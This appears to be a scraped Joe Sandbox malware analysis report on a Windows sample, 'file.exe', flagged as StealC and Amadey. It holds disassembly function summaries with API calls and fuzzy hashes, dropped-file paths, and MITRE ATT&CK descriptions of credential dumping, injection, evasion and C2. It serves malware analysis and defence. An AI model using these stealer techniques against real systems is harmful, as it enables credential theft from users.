Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 63855311e59aab3544e54a11f932fb119658c9a3ce5d3e3eb56ab42802127ec7
Instruction ID: da64afc706055f49904e27ea8143a03974d0227f167dcbe3a15482497c05199b
Opcode Fuzzy Hash: 63855311e59aab3544e54a11f932fb119658c9a3ce5d3e3eb56ab42802127ec7
Instruction Fuzzy Hash: 64E030767006189BCA10EFA8DC4488677ACEE4D2703150565E691C3700D631F905CBA1

Function 6CAD4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAD4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CAD4DE6

Strings

%d.%d, xrefs: 6CAD4DDE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: afe66d3f44c18ee2fa934d4a710ba4d8fd69982b78531bafb1c706c525920d97
Instruction ID: d9a3b90a6894c73c007cc2aae85172b7cd0b15e7e7631786fe3e4fb1b21d6222
Opcode Fuzzy Hash: afe66d3f44c18ee2fa934d4a710ba4d8fd69982b78531bafb1c706c525920d97
Instruction Fuzzy Hash: 3A31ECB2D042586BEB105FA09C05BFF7768DF45308F050469ED55A7781EB30A949CBA1

Function 6CB70900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6CB70917
sqlite3_value_text.NSS3(?), ref: 6CB70923

Part of subcall function 6CA313C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA02352,?,00000000,?,?), ref: 6CA31413
Part of subcall function 6CA313C0: memcpy.VCRUNTIME140(00000000,6CA02352,00000002,?,?,?,?,6CA02352,?,00000000,?,?), ref: 6CA314C0

Strings

error in %s %s%s%s: %s, xrefs: 6CB70944

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: c994e79bfac931e87140e68192ace04af564f919a704ea851f42973c367f877b
Instruction ID: 40450e1483abc80690f495994d64f5c39262c2cc7dc5742ddb0773cd5f30f717
Opcode Fuzzy Hash: c994e79bfac931e87140e68192ace04af564f919a704ea851f42973c367f877b
Instruction Fuzzy Hash: 800148B6E001455BEB019E18FC019BB7B75EFC0218F144028ED485B711F732AD5887A2

Function 6CB1AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CB1AF78

Part of subcall function 6CA7ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA7ACE2
Part of subcall function 6CA7ACC0: malloc.MOZGLUE(00000001), ref: 6CA7ACEC
Part of subcall function 6CA7ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA7AD02
Part of subcall function 6CA7ACC0: TlsGetValue.KERNEL32 ref: 6CA7AD3C
Part of subcall function 6CA7ACC0: calloc.MOZGLUE(00000001,?), ref: 6CA7AD8C
Part of subcall function 6CA7ACC0: PR_Unlock.NSS3 ref: 6CA7ADC0
Part of subcall function 6CA7ACC0: PR_Unlock.NSS3 ref: 6CA7AE8C
Part of subcall function 6CA7ACC0: free.MOZGLUE(?), ref: 6CA7AEAB

memcpy.VCRUNTIME140(6CBE3084,6CBE02AC,00000090), ref: 6CB1AF94

Strings

SSL, xrefs: 6CB1AF73

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: de63b02ecc115b32da994aa0a62ce79ff494ff789e5b08a658306b9e6285588c
Instruction ID: 930dbb2b1d1a26578e5e4e461b68013a9cc8dbc366a30b119db0a57fe5a0bf00
Opcode Fuzzy Hash: de63b02ecc115b32da994aa0a62ce79ff494ff789e5b08a658306b9e6285588c
Instruction Fuzzy Hash: E22149F6309AC89FCAC0DF52A5077327ABAB34EB9875091A9C1084BF36D73581489FD1

Function 6CA70F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B

Part of subcall function 6CA71370: GetSystemInfo.KERNEL32(?,?,?,?,6CA70936,?,6CA70F20,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000), ref: 6CA7138F

PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

Part of subcall function 6CA71110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CA70936,00000001,00000040), ref: 6CA71130
Part of subcall function 6CA71110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA70936,00000001,00000040), ref: 6CA71142
Part of subcall function 6CA71110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA70936,00000001), ref: 6CA71167

Strings

clock, xrefs: 6CA70F20

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 63b5118c5e969ce41319293dfa1d77844e2ef1ea83472d9fb2734d14f6bf04aa
Instruction ID: 3be1accaaaa35ceaa06bcc2314d2107527d1f0d8933c8725603c64bc91a702d5
Opcode Fuzzy Hash: 63b5118c5e969ce41319293dfa1d77844e2ef1ea83472d9fb2734d14f6bf04aa
Instruction Fuzzy Hash: FBD0223920014811C961A2579C88BB6B3ECE7C36B9F100826E20C02D400A3480DED276

Function 6CAE0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CAE0DF5
TlsGetValue.KERNEL32 ref: 6CAE0E2D
TlsGetValue.KERNEL32 ref: 6CAE0E58
TlsGetValue.KERNEL32 ref: 6CAE0E84

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: a236181338a84311542dc7450a2e64b2c3848adbb2272f613dfcba4ffb4ac4ac
Instruction ID: c9699e32d2a16cedd00da4e322ba6611c1286c0a1d12289c983e3e4a9cedffc5
Opcode Fuzzy Hash: a236181338a84311542dc7450a2e64b2c3848adbb2272f613dfcba4ffb4ac4ac
Instruction Fuzzy Hash: 2831AEB06443858FDB10AF78858426977B8BF0E748F194679D888C7A21EF3590C5EAD2

Function 6CA3A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6CA3A468,00000000), ref: 6CA3A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CA3A468,00000000), ref: 6CA3A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CA3A468,?,6CA3A468,00000000), ref: 6CA3A545
memcpy.VCRUNTIME140(00000001,6CA3A468,00000001,?,?,?,6CA3A468,00000000), ref: 6CA3A57D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: e1d7d1d408c94e72a307bdea2baed2da3abbd86b9cf6a5a71534ffa87c25c073
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 4D11E4B3D0026557DF0089F99C916AF779AAB95268F284234ED28C7780F639994882E1

Function 6CAE0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA82AF5,?,?,?,?,?,6CA80A1B,00000000), ref: 6CAE0F1A
malloc.MOZGLUE(00000001), ref: 6CAE0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAE0F42
TlsGetValue.KERNEL32 ref: 6CAE0F5B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 0f27ccf0619b602673e08853682347b7bae1c4a3a22ff93a1c4a23690cfd17c0
Instruction ID: 4e24af96e9aaee8e75337388ffc5adc9c8d966980e1f1c55abc109ffe71f0279
Opcode Fuzzy Hash: 0f27ccf0619b602673e08853682347b7bae1c4a3a22ff93a1c4a23690cfd17c0
Instruction Fuzzy Hash: 4E01F0B1E002905BE7102B3D9E045567B6CFF57299F050175EC1CC3A21DF31D4A5D5E2

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAEBFIIECBGCBGDHCAFC

C:\ProgramData\DBFBFBGDBKJJKFIEHJDB

C:\ProgramData\DHJJEGHIIDAFIDHJDHJEBAEGHC

C:\ProgramData\EBFHJEGD

C:\ProgramData\GCGDHJDA

C:\ProgramData\KEGIDHJKKJDGCBGCGIJKKECAAE

C:\ProgramData\KKJDGDHIDBGIECBGHJDB

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre